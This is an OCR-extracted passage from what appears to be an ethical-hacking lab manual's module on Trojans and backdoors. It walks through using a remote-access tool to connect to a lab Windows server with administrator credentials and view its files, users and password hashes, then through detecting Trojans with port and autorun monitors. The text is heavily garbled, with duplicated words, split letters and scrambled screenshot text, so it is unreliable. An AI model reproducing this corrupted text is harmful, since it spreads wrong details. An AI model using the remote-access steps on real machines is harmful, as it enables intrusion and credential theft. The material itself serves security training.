I n fo fo rm r m a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed Successful send httpserver.exe 011 victim machine O utp ut: Kille Killed d Process Process System s111ss.exe csrss.exe
H T T P T r oj o j an an
winlogon.exe serv1ces.exe lsass.exe svchost.exe dwm.exe splwow64.exe httpserver.exe t 1retov.exe
Questions 1. Determine the ports that HTT P proxy server server Trojan uses uses to communicat communicate. e. Internet Connection R equired
□ Yes
0 No N o
Platform Supported
0
CEH L ab Manual Page 460 460
Classroom
0
iLabs
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Rem Rem ote A cce cc ess Troja Trojans ns Using sing A telie te lierr Web Web Rem Rem ote Comm Com m ande nd er .4 Trojan is a program tha that contains malicious malicious or harm harmful ful cod codee inside inside apparently harmless programming or data in such such a )),ay ay tha th at it it can can get control and and cause cause damage damage,, such as ruinin ruining g the fie fi e allocation table on a har hard drive. ICON
KEY
/ Valuable information y 5 Test your
knowledge TTTTT
Web exercise
m
Workbook review review
Lab Scenario A back door Tro jan is a very dangerous dangerous infection that com promises the integrity integrity of a computer, its data, and the personal information of the users. Remote attackers use backdoors as a means of accessing and taking control of a computer that bypasses security mechanisms. Trojans and backdoors are types of bad-wares; their main purpose is to send and receive data and especially commands through a port to another system. This port can be even a wellknown port such as 80 or an out of the norm ports like 7777. Trojans are most of the time defaced and shown as legitimate and harmless applications to encourage the user to execute them. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.
Lab Objectives JT Tools Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
The objective objective of tins lab lab is to help students learn to detect Trojan and backdo or attacks. The objectives of tins lab include: •
Gain access access to a remote com puter
•
Acquire sensiti sensitive ve informa tion o f the remote computer
Lab Environment To cany out tins, you need: 1.
CEH Lab Manual Page 46 461
Atelier Web Rem ote Comm ander located at D:\CEH-Tools\CEHv 8 Module Module 06 Trojans Trojans and and Backdoors\Trojans Typ es\Rem ote A cc es s Trojans (RAT)\Atelier Web Remote Commander
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
■
A com puter running Window Window Server 2008 (host) Windows Server 200 3 runn running ing in Virtual Machine
■ If you decide decide to download the the latest version, then screenshots shown 111 the lab might differ ■
You need a web browser to access access Intern et
■
Administrativ Adm inistrativee privileges privileges to ru n tools
Lab Duration Time: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining the tile allocation table on a hard drive. Note: The versions of the created client or host and appearance may dilfer from
what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab. a*
TA SK
1
Atelier Web Remote Commander
Lab Task Task s 1. Install and launch Atelier Web Rem ote Comm ander (AW (AWRC) 111 Windows Server 2012. 2. To launch Atelier Web Rem ote Comm ander (AWRC (AWRC), ), launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop. u
§
€
3 Wind ows Server Server 2012 2012 s u . t
M V M o m S w v w X V ? D M w C M i d M •
0d E v a lu a t o r c g p t . E u C M . r w* M 13P 1
FIGURE 6.1 6.1:: Windows Server 2012 2012 Start-Desktop
3. Click AW Rem ote Commander P rofessional 111 the Start menu apps.
CEH L ab Manual Page 462 462
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Administrator A
Start C t n v U c r
T n f c
£
* Took
AW fieoiote Connwn..
4
&
FIGURE 6.2: Windows Server 2012 Start Menu Apps
4. The main window o f AWRC will appear as shown 111 the following screenshot. AWRC PRO 9.3.9 File
Tools
Desktop
Help Syclnf o
Netwark lnfo
FJ# Sy*t*fn
Uc*rs *nr. Grocpc
Chat
Tliis toll is is used to gain access to all the information of die Remote Remote system
Progress Report
y, Connect df
Disconnect
0 Request Request ajthonrabor ajthonrabor
ff iy te te sl sln : C
@ dear on iscomect k8psln: 0
Connection Duraton
FIGURE 6.3: Atelier Web Remote Commander main window
5. Inp ut the IP addr ess and Username I Password of the remote computer. 6. 111 tins lab we have used Win dow s Server 2008 (10.0 (10.0.0.13): .0.13): ■ User name: Ad minis trator ■ Password: qwerty@123 Note: The IP addresses addresses and credentia credentials ls might differ 111 your labs
7. Click Connect to access the machine remotely.
CEH L ab Manual Page 463 463
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGURE 6.4: Providing remote computer details
Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
8. T he following screenshots show tha t you will will be accessing accessing the Windows Server 2008 remotely. S File
10.0.0.13 :AWRC PRO 9.3.9 Tools
Desktop
Help Syslnf o
Netwo ridnfb
Fie System
Use's anc Groups
Chat
Internet Explo Explo er windows update
j Notepad
~ *T F V
*29 Monitors *
Remote Host
Progress Report | administrator
W C o n ne ne c t c f
□ Requestajthoniabor
k5yle*I11; 201.94
^
#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13
D is is c on on n ec ec t
@ C l ea ea r o n i s c o m e c t k B^IiL B^I iL 0 .8 7
CumcLiimi Duiaim i: iMinuce, 42 Seco Seconds. nds.
FIGURE 6.5: Remote computer Accessed
9. The Co mm ander is is connected to the the Remote System System.. Click Click tlieSys Info tab to view complete details of the Virtual Machine.
CEH L ab Manual Page 464 464
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
FIGURE 6.6: 6.6: Information of the remote computer
10. Select Networklnfo Path where you can view view network information. S
10.0.0.13: AWRC PRO 9.3.9
File
Iools
Desktop
Help Syslnf o
| Netw oriJn fo
\ ADMINS C$ IPCS
& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
| Ffe System
Use's anc Grocps
\
Ports Safeties
Remark Spe . Remote Admin Spe .. Default share Spe .. Remote IPC
Permissions Max Uses net applica... unlimited not ap pli ca. . unlimited net applica unlimited
Remote Host
Chat
P/Transport Protocols
Current Current Uses
Path
Passwoid not val■ not vali not vaN
Progress Report #16.28.24 Initializing, please wait #16:28:25 Connected to 10 0.0.13
^ e
Connect Conn ect
Request st ajthonrabor ajthonrabor P D Reque Ifiytesln: 250.93
A / Disconn Disconnect ect @ dear on iscomect kSps In: 0.00
Connection Dur aton: 5Minutes, 32 Seconds.
FIGURE 6.7: 6.7: Information of the remote computer
11. Select the File System tab. Select c:\ from the drop-down list and click Get. 12. 12. Tins tab lists lists the com plete files files ol the C :\ drive o f Win dow s Server 2008.
CEH L ab Manual Page 465 465
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
10.0.0.13: AWRC PRO 9.3.9 file
Iools
Help
Desktop
Syslnf o
contents of
NetworicJnfb
I Fie System I Use's and Groups
Chat
'c:'_______
CIJ SRecycle Bin C l Boot Boot C3 Documents and Settings C□ PerfLogs D Program Files (x86) (x86) □ Program Program Files C l ProgramData ProgramData D System Volume u me Inform... Inform... □ U se se rs rs □ Window Windowss File System:
NTFS
Type Type
Serial Number: Number:
6C27-CD39
Labei:
Fixed
Capacity:
17,177,767.936 bytes
Free space:
6.505.771.008 bytes
Progress Report | administrator ^
cf
C o n n e ct ct
]Request ]Request ajthoriratxx
#16.28.24 #16.28.24 Initializing, pleas e wait... #16:28:25 Connected to 10.0.0.13
Password
D i sc sc o n n ec ec t @ Oear on on iscome ct
kBytesIn: 251.64
Connect onCXjr aton: 6 Minutes, 18Seconds.
FIGURE 6.8: Information of the remote computer
13. Select Users and Groups, which will display the complete user details. 10.0.0.13 10.0.0.13 :AWR C PRO 9.3.9 9.3.9 File
Jools
Desktop
j
Users Users
' :
"
Help Syslnf o
^ Groups Groups
NetworkJnfo \
Ffe System
Use's anc Groups
I Chat
Passwor Password d Ha^ies
User Information for Administrator User Account. Administrator Administrator Passw ord Age 7 days 21 hours 21 21 minutes 33 seconds Privilege Level: Administrator Comment Built-in account for administering the computer/domain computer/domain Flags: Logon script executed. Normal Account. Full Name: Workstations can log from: no restrictions Last Logon: 9/20/2012 3:58:24 AM Last Logoff: Unknown Account expires Never expires Use r ID (RID) 500 Pnmary Global Group (RID): (RID): 513 SID S 1 5 21 1858180243 1858180243 3007315151 3007315151 1600596200 500 Domain WIN-EGBHISG14L0 No SubAuthorties 5
Remote Host
User Name
[administrator
10.0.0.13
W C o n ne ne c t
nf
D Request Request ajthon:at> ajthon:at>or or
kByle* 111: 256 .00
^
D is is c on on n ec ec t
Password
Progress Report
#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13
@ Oear on on iscome ct Cumeuiimi3u1atu< 1 : e Minutes, 26Seconds.
FIGURE 6.9: Information of the remote computer
CEH L ab Manual Page 466 466
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
rs
10.0.0.13: 10.0.0.13: AWRC PRO9.3.9 O9.3. 9
file
Iools
Help
Desktop
Syslnf o
Netwo rtJnf o
We System
Use's and Groups
Chat
\ | Grou Groups ps ~ |y Passwoid Ha«hes
Groups:
Names Administrators Backup Backup Operator Operator Certifi Certificat cate e Service Service DC Crypto Cryptograp graphic hic Oserat Oserat Distributed Distributed COM Use s Event Event Log Log Readers Readers G ue ue sstts
SID S-1-5-32-544 S-1-5-32-544 (Typo Ali as/Do S-1-5 S-1-5-3 -322-55 551 1 (Ty (Type pe Alia Alias/Do s/Do S-1-6S-1-6-3232-674 674 (Typ (Type e Alias/Do . S-1-5S-1-5-3232-569 569 (Typ (Type e Alias/Do Alias/Do
Comment Administrators have have complete and unrestricted Backup Backup Oper Operato ators rs can over overri ride de secur security ity restri restrict ct Members Members of this this group group are allowed l owed to connect connect t« Members Members are are author authorized ized to perfo perform rm crypto cryptogra graph ph
S-1-5-32-5 S-1-5-32-562 62 (Ty (Type pe Alias/Do . 5-1-55-1-5-3232-573 573 (Typ (Type e Alias/Do... Alias/Do... S-1-5-32-546 (Type Al Ali as as //D Do
Members are allowed to launch. aunch. actKate and us Members Members of this this group group can read read eve event nt logs from from Gu es es ttss ha have the sa same ac ac ce ce ss ss as as me members of oft
III
<1
_____I
Global Groups:
S- 1-5-21-1858180243 1-5-21-1858180243-3007315... -3007315... Ordinary users
Progress Report |administrator
^ c f
Connect Conn ect ]Requ ]Request est ajthonrabor ajthonrabor
kBytesIn: 257.54
Disconn Disconnect ect
Password
#16.28.24 #16.28.24 Initializing, pleas e wait... #16:28:25 Connected to 10.0.0.13
@ dear on iscomect
Connection Connection Ouraton: ?Minutes, 34Seconds. 34Seconds.
FIGURE 6.10: Information of the remote computer
FIGURE 6.11: Information of the remote computer
14. 14. Tins tool will display all all the details details o f the rem ote system. system. 15. Analyze the results of the remote computer.
Lab An alysis alysis Analyze and document tlie results related to die lab exercise. Give your opinion on your target’s security posture and exposure dirough public and tree information.
CEH L ab Manual Page 467 467
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
P L E A S E T AL A L K TO T O Y O U R I N S T R U C T O R I F Y O U H A VE VE Q U E S T I O N S RELATED TO THIS LAB.
To ol/Utility ol/Utility
Information Information Co llected/Objecti llected/Objectives ves Achieve Achieved d Remotely accessing Windows Server 2008 Re sult: Syste System m information of remote Windows Server 2008
Atelier Web Remote Commander
N etw et w or k In Info fo rm atio at ionn P ath at h rem re m ote ot e W ind ow s Server Serv er 2008 viewing complete tiles tiles of c: \ of remote Windows Server 2008 User and Groups details of remote Windows Server 2008 Password hashes
Questions 1. Evaluate die ports that A\\”RC A\\”RC uses to perfo perform rm operations. 2. Determ ine whe ther it is possible to launch AWRC from fro m the com mand man d line line and make a connection. I f ves, ves, dien illustrate illustrate how it can be done. Internet Connection R equired □ Y es
0 No
Platform Supported 0 C la l a ss ss rro o om om
CEH L ab Manual Page 468 468
Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Detecting Trojans A Trojan is aprogram that that contains malicious or harm harmfful code inside apparently harmless pr programming or dat data in such a > raj that that canget control and and cause damage, such as mining the file file al allocation table on a ha hard drive. ICON
KEY
Lab Scenario
Valuable f~'/ f~'/ Valuable
Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful viruses. A . ■'* Test your ____ ____ knowledge ______ back ba ckdo do or Troj Tr ojan an can be extrem extr emely ely harm ha rmfu full if no t dealt dea lt w ith app approp ropriate riately. ly. The Th e main function of tins type of virus is to create a backdoor 111 order to access a Web exercise ^ specific system. With a backdoor Trojan attack, a concerned user is unaware m Wor Workb kbook ook revi review ew about the possible effects until sensitive and important information is found missing from a system. With a backdoor Trojan attack, a hacker can also pe rf rfor or m othe ot he r types o t maliciou mali ciouss attacks attac ks as well. Th e othe ot he r name na me fo forr back ba ckdo do or Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://www.combofix.org http://www.combofix.org). ). information
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.
Lab Objectives The objective objective of tins lab lab is to to help students learn to detect Tro jan and b ackdoor attacks. The objectives objectives o f the lab mclude: mclude: & T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors
CEH L ab Manual Page 469 469
•
Analyze Analyze
using Po rt Mo nitor
•
Analyze Analyze
using Process M onitor
•
Analyze
using Registry M onitor
•
Analyze Analyze using Startup Program Mo nitor
•
Create MD 5 hash tiles tiles for Window s directory files files
Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Lab Environment To carry out this, you need: need:
Tcpview, located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView
Autoruns, located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Ba ckd oors\P rocess Monito Monitori ring ng Tools\Autoruns Tools\Autoruns
PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Ba ckd oors\P rocess Monit Monitor or Tool\Prc Tool\Prc View Jv16 power tool, located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012 FsumFrontEnd. located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
■
Window Server 200 8 (host) A compu ter running Window
& Disabling Disabling and Deleting Deleting Entries
■
Windows Server 200 3 running 111 Yutual Machine
If you don't want an entry to active die nest time you boot or login you can either either disable or delete it. To disable an entry uncheck it. Autoruns will store die startup information in a backup backup location location so diat it can reactivate die entry when you recheck it. For items stored in startup folders Autoruns creates a subfolder named Aiitoruns disabled. Check a disabled item to re-enable it
■ If you decide decide to download the the latest v ersion, then screenshots shown 111 the lab might differ ■
You need a web brow ser to access Inte rne t
■
Administrative Admin istrative privileges to ru runn tools
Lab Duration Tune: 20 Minutes
Ov erview of Trojans Trojans and and Backdoors A Trojan is a program diat contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die lile allocation table on a hard drive. Note: The versions of the created client or host and appearance may differ from
what it is 111 the lab, but the actual process of connecting to the server and accessing the processes is same as shown 111 tins lab. m . T A S K
1
Tcpview
Lab Task Task s 1. G o to Windows Server 2012 Virtual Machine. 2. Install Tcpview from the location D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPYiew TCP Yiew main window wind ow appears, with details details such as Process, Process ID, Protocol, Local address. Local Port, Remote Address, and Remote Port.
CEH L ab Manual Page 470 470
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
TCPView - Sysinternals: www.sysinternals.com
File Options Process View H
03 Should delete items that you do not wish to ever execute. Do so by choosing Delete in the Entry menu menu.. Only die currendy selected item will be deleted.
a
h
Help
|
|| Process Process > C l dns.exe T7 dns.e dns.exe xe T 7 dns.exe T 7 dns.exe i - dns.exe I" 7 dns.exe i 7 dns.exe i" 7 dns.e dns.exe xe IF dns.e dns.exe xe » dns.exe 1 dns.exe » 1 dns.exe T 7 dns.exe r dns.e s.exe » dns.exe T dns.exe dns.exe r dns. dns.e exe dns.exe dns.exe 1 dn dns.exe 1 dn dns.exe T dns.exe • dns.exe • dns.exe
PID 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572
Protocol TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP
Local Address win-2n9stosgien WIN-2N WIN-2N9ST 9ST0SG 0SGL L WIN-2N9ST0SGL win-2n9stosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGI.. WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGI.. WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9STOSGI.. WIN-2N9STOSGL
Local Pott domain dom domain 49157 domain domain 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49162 49163 49164 49165 49166 49167 49168 49169 49170 49171
w fl
V/l Wl
V
< r
1
>
II IIII
________ ____________ _____ _ ________ _____________ ______ _ ________ _____________ ______ _ ________ _____________ ______ _
U
_______ __________ _______ _______ ___
FIGURE 8.1: Tcpview Main window
tool perform port monitoring. TCPView - Sysinternals: www.sysinternals.com
-
1 File Options Process
y
G3 If you are running Autoruns without administrative privileges privileges on on Windows Vista and attempt to change die state of a global entry, you'll be denied access
a
View
I~ I □ f
X
Help
! @
Process ' E l svchoste svchostexe xe (O svchostexe E l svchost.exe E l svchost.e svchost.exe xe E l svchost.exe E sv s vchost.exe E svcho svchost.e st.exe xe E sv s vchost.exe E sv s vchost.exe 1' svchost.exe E svchost.exe 1' svchost.exe E svchost.exe [ □ sv svchost.exe E sv s vchost.exe E svchost.exe E svcho svchoste stexe xe E svcho svchost.e st.exe xe T7 System 1 System System • 1 System • ' System 7 System T 7 System System • 1 System System
PID 385G 892 960 1552 2184 3440 4312 4272 1808 1552 1552 9G0 1552 3092 960 960 1064 960 4
4 4 4 4 4 4 III
Protocol TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP TCP TCP
Local Address WIN-2N9ST0SGI.. WIN-2N9STOSGI.. WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGI.. WIN-2N9ST0SGI.. WIN-2N9STOSGL WIN-2N9ST0SGI.. win-2n9stosgien win-2n9stosgien WIN-2N9ST0SGI... win-2n9stosgien WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9ST0SGI... WIN-2N9STOSGI.. win-2n9stosgien win-2n9stosgien win-2n9stosgien win-2n9stosgien WIN-2N9STOSGI... WIN-2N9STOSGI... WIN-2N9STOSGI... WIN-2N9STOSGI...
n
|Local Port 5504 49153 49154 49159 49161 49163 49168 49169 49187 bootps bootpc isakmp 2535 3391 teredo ipsec-msft llmnr 53441 netbios-ssn microsoft-ds microsoft-ds http https microsoft-ds 5985
1R^ Wl Wl Wl Wl Wl Wl Wl Wl Wl
* *
Wl wir wit Wl Wl Wl Wl v >
FIGURE 8.2: Tcpview Main window
5. No w it is analyzing analyzing die SMTP and odier ports. ports.
CEH Lab Manual Page 47 471
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
TCPView - Sysinternals: www.sysinternals.com File
y & Autoruns will will displa display ya dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch initially launch Autoruns with administrative rights
Cl There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit chose Jump To in the En try menu or double-click on the entry or location's line in the display
Options
Process
View
Help
a
“rotocol CP CP CP CP CP CP CP CP CP CP DP DP DP DP DP DP DP DP DP CP CP CP CP CP CP <
Local Address WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL win-2n9stosgien win-2n9stosgien WIN-2N9ST0SGL win-2n9stosgien WIN-2N9ST0SGL WIN-2N9 WIN-2N9ST0 ST0SGL SGL WIN-2N9STOSGL WIN-2N9ST0SGL win-2n9stosgien win-2n9stosgien win-2n9slosgien wirv2n9$tosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2 IN-2N9 N9ST ST0S 0SG GL
Local Port 3388 5504 49153 49154 49159 49161 49183 49168 49169 49187 bootps bootpc isakmp 2535 3391 tere teredo do ipsecmsft lmnr 53441 netbios-ssn microsoft-ds microsoft-ds http https microsoft-d ft-dss
Remote Address WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI..
x
Remote Pott 0 0 0 0 0 0 0 0 0 0 *
Stat LIST LIST LIST LIST LIST LIST LIST LIST LIST LIST
* * * * WIN-2N9ST0SGL 0 win-egbhisgl 41 410 49158 windows8 49481 WIN-2N9ST0SGI.. 0 WIN-2N9ST0SGI.. 0 WIN-2 IN-2N N9ST0SGI.. I.. 0 .
LIST EST, EST, LIST LIST LIST
III
FIGURE 8.3: Tcpview analyzing ports
You can also kill kill die process by double-clickuig double-clickuig diat respective process, and dien clicking die End Process button. butt on. Prope rties for dns.exe: dns.exe: 1572 |
Domain Name System (DNS) Server Microsoft Corporation Corporation
Version:
G.02.8400.0000
Path: C:\Windows\System32\dns.exe End Process OK
FIGURE 8.4: Killing Processes 1m
TASK
2
Autoruns
Go to Windows Server 2012 Virtual Virtual Machine. Machine. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv 8 Module Module 06 Trojans and B ack doo rs\Pr ocess Monito Monitorin ring g Tools\Autoruns. Tools\Autoruns.
It lists all processes. DLLs, and services.
CEH L ab Manual Page 472 472
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Autoruns [WIN-2N9STOSGIEN\Administrator] Sysinternals: www.sysinter.J ~
O
File
Entry
Options
HijacksImage3
User
|ExecuteBoot 3 |Codecs
&
1f t Winso ck Provtders ]
O
Everything Everything
Help
Logon
|
Print Monitors Monitors | < Explorer Explorer |
t j j LSA Providers Providers |
&
£
Internet Explorer Explorer | J
Scheduled Tasks |
Autorun Entry Description Description Publisher Publisher \CurrentVers 10n\Winl 0g0nl'AppS etup }jf HKLM\SOFTWARE\Microsof t\Wind ow$ N T\CurrentVers
O You can view Explorer's Explorer's file properties dialog for an entry's image file by choosing Properties in die Entry menu. You can also have Autoruns automatically automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.
0
, $► Applnit
Network Providers Providers | 9 .
g ] UsrLogon UsrLogon cmd
|
,V
Know KnownD nDLLs LLs
|
A
Sidebar Sidebar Gadgets Gadgets
Services |
Drivers Drivers
Image Path Path c:\windows\syste c:\windows\system32 m32\usrlo.. \usrlo....
H KLM \S 0 FTWAR FTWAR E\M croscr ft\Wndows\CurrentVers10n\R un 0
[■13HotKeysCmds
hkcmd Module
Intel Corporation Corporation
0
£ 3 IgfxT ray
igfxTray Module
Intel Corporation Corporation
c:\windows\system32\igfxtr...
0
[ ■1
Intel Corporation Corporation
c:\windows\sys tem32\igfxp...
$
Persistence
persistence Module
c: \windo ws\sy stem32\hkc...
H KLM KLM \S 0 FTWARE\W0w64 32N ode\M icr osott\Wmdows\CurrentVersion\R un un E
Adobe ARM
0
[■1 Adobe Reader Reader
0
Adobe Reader Reader and Acrobat. .. Adobe Systems Systems Incorporated c: \program files (x86)Vcomm... Adobe Acrobat Acrobat SpeedLaun.. SpeedLaun.. Adobe Syste Systems ms Incorporate Incorporated d c:\program c:\program file files s (x (x 86)\adob
EPS0N_UD_S.. EPS0N_UD_S.. EPSON EPSON USB USB Displa Display y VI
r a r \
. .
^
. T
40
SEIKO EPSON EPSON CORPORA.. c:\program files (x86)\epso... ^
.
Ready
.
™
.
Windows Entries Entries Hidden. Hidden.
FIGURE 8.5: Automns Main Window & Simply Simply run Autoruns and it shows you die currendy configured autostart applications in the locations that most direcdy execute applications. applications. Perform a new scan that reflects changes to options by refreshing refreshing die display display
1 °-
following is the detailed list on die Logon tab. O
Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
I File
Entry
Option s
User
d is is ) ^ 1 X ^ H
Code Codecs cs
|
P
Boot Boot Exec Execute ute
fc* Winsock Provide Providers rs
!3
Everything |
0
[i j]
0 0
Logon
^ Explorer
lil
4$
|
Know KnownD nDLLs LLs
Network Network Provide Providers rs |
'1 Scheduled Tasks |
|
^
Winlo Winlogon gon
Sidebar Gadge Gadgets ts Services
^
Drivers Drivers
Image Path Path
Intel Intel Corpora Corporation
c:\windom\syst em32\hkc...
Intel Corporation Corporation
c:\windows\system32\igfxtr
Intel Intel Corpora Corporation
c:\windows\system3 c:\windows\system32\igfxp 2\igfxp .
Adobe Reader Reader and Acrobat. .
Adobe ARM
Adobe Reader...
£
Publisher Publisher
persisten persistence ce Module Module
E3
[j ) Appln Applnit it
Internet Explorer Explorer
Persisten Persistence ce
0
|
LSA Provide Providers
igfxT ray Module
0
9
Image Image Hjacks Hjacks
HotKey HotKeysC sCmds mds hkcmd Module Module
S
0
^
Description Description
lafxT lafxTra rav v
0
|
Print Monitors Monitors
Autorun Entry
CQ Internet Explorer This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions
Help
Adobe Systems Systems Incorporated
Adobe Acrobat SpeedLa SpeedLaun... un...
c:\program files (x86 )\comm..
Adobe Syste Systems ms Incorporate Incorporated d
c:\prog 1am files (x86)\adob..
EPS0 N_UD _S. EPSON EPSON USB USB Display Display V I. 40
SEIKO EPSON CORPORA... CORPORA... c:\pr ogram files (x86)\epso.
Google
0 fH
googletalk
Google Tak
SurvlavaUpdat JavalT M) Update Scheduler Scheduler
c:\program files (x86)Vgoogl. Sun Microsystems, Microsystems, Inc.c:\program files |x86 )Vcomm
t S C:\ProgramDa C:\ProgramDala\Microsoft\W la\Microsoft\Windows\Start indows\Start Menu\P Menu\Progca rogcams\S ms\Startup tartup
Ready
Windows Entries Entries Hidden
FIGURE 8.9: Autonuis Logon list
11 11.. The Th e following are die Explorer list details.
CEH L ab Manual Page 473 473
Ethical Ha ckin g and Coun termea sures Copyiight Copyiight © by EC-Counci EC-Councill All Rights Reserved. Reproduct ion is Stricdy Proliibited.
Wriogon
M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s
Autoruns [WIN-2N9STOSGIEN\Administrator] Sysinternals: www.sysinter...L
O
File
Entry
| Codecs Codecs
|
3
User
Z? Eve Everyth rything ing | ^
Help
Boot Boot Execute Execute
Winsock Providers |
& Services All Windows
services configured to start automatically when the system boots.
Options
|
3
Image Image H^acks H^acks
1* Print Monitors
Logon[ Logon[
Autorun Entry
,j
Explor xplorer er
|
£
|
'■> Applnit Applnit
LSA Providers | Internet Explorer Explorer | J
Desciiption
|
'
KnownDLL KnownDLLs s
]
Network Providers | Scheduled Tasks |
A
W nbg on
Sidebar Gadgets Services |
Drivers Drivers
Image Path
Publisher Publisher
H KLM \S 0 FTWAR FTWAR E\Classes\Proto cois\F*er 0
^ te xt /x m l
Microso Microsoft ft OfficeXML MIME... MIME... Microso Microsoft ft Corpora Corporation
c:\pr 0gramfiles\c 0fnm0n f i . .
•iff HKLM \S oftware\ Class es\x\S heC xVContextM enuHandlers 0
^
SnagltMainSh .. Snagit Shell Shell Extension Extension DLL
0
fo
WinRAR WinRAR shel extension extension
